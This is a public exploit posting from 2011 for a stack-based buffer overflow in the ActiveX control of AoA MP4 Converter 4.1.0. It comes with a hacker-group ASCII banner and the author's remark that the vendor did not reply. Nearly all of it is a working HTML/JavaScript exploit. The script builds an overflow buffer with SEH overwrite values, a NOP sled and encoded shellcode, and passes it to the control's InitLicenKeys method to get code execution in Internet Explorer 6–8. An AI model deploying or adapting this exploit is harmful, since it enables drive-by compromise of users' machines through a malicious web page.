AoA MP4 Converter version 4.1.0 suffers from an active-x related stack overflow vulnerability.
4d51b4dca9a734a9dee704fc40ee8a7c19b4c3da24561d8bbc28a17cbabece2f
# Exploit Title: AoA Mp4 converter v4.1.0 Activex
# Date: Febrary 07 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.aoamedia.com/AoAMP4Converter.exe
# Version: v4.1.0
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
________ _ _________ ____ __ _____ ________
/ ____/ / | | / / ____/ | / / //_// _/ | / / ____/
/ __/ / / | | / / __/ / |/ / ,< / // |/ / / __
/ /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
COLOMBIA hacking presents.............
FIX your SkinCrafter.dll
AoA Mp4 converter v4.1.0 exploit for IE 6 ,IE 7 , IE 8
just some badchars :( thanks sud0
fataku....DONT BE LAZY!!
the vendor dint replay my emails so here is the exploit
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target'></object>
<script language='javascript'>
nseh="\xEB\x06\x90\x90";
seh="\xB7\x1A\x01\x10";
nops="\x90\x90\x90\x90\x90\x90\x90";
shell= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4b\x58\x4e\x4e\x45\x45\x4b\x48\x4e\x4e\x4a\x56\x42\x52\x42\x32\x42\x32\x4f\x52\x4a\x36\x43\x56\x41\x36\x4e\x36\x43\x56\x4d\x38\x45\x44\x4a\x4f\x42\x35\x4a\x4b\x47\x4c\x43\x39\x44\x4c\x47\x37\x4f\x4f\x42\x4d\x5a";
junk1="A";
junk2="A";
while (junk1.length<2048){ junk1+=junk1;}
junk1=junk1.substring(0,2048);
junk2=junk1;
arg1=junk1+nseh+seh+nops+shell+junk2;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>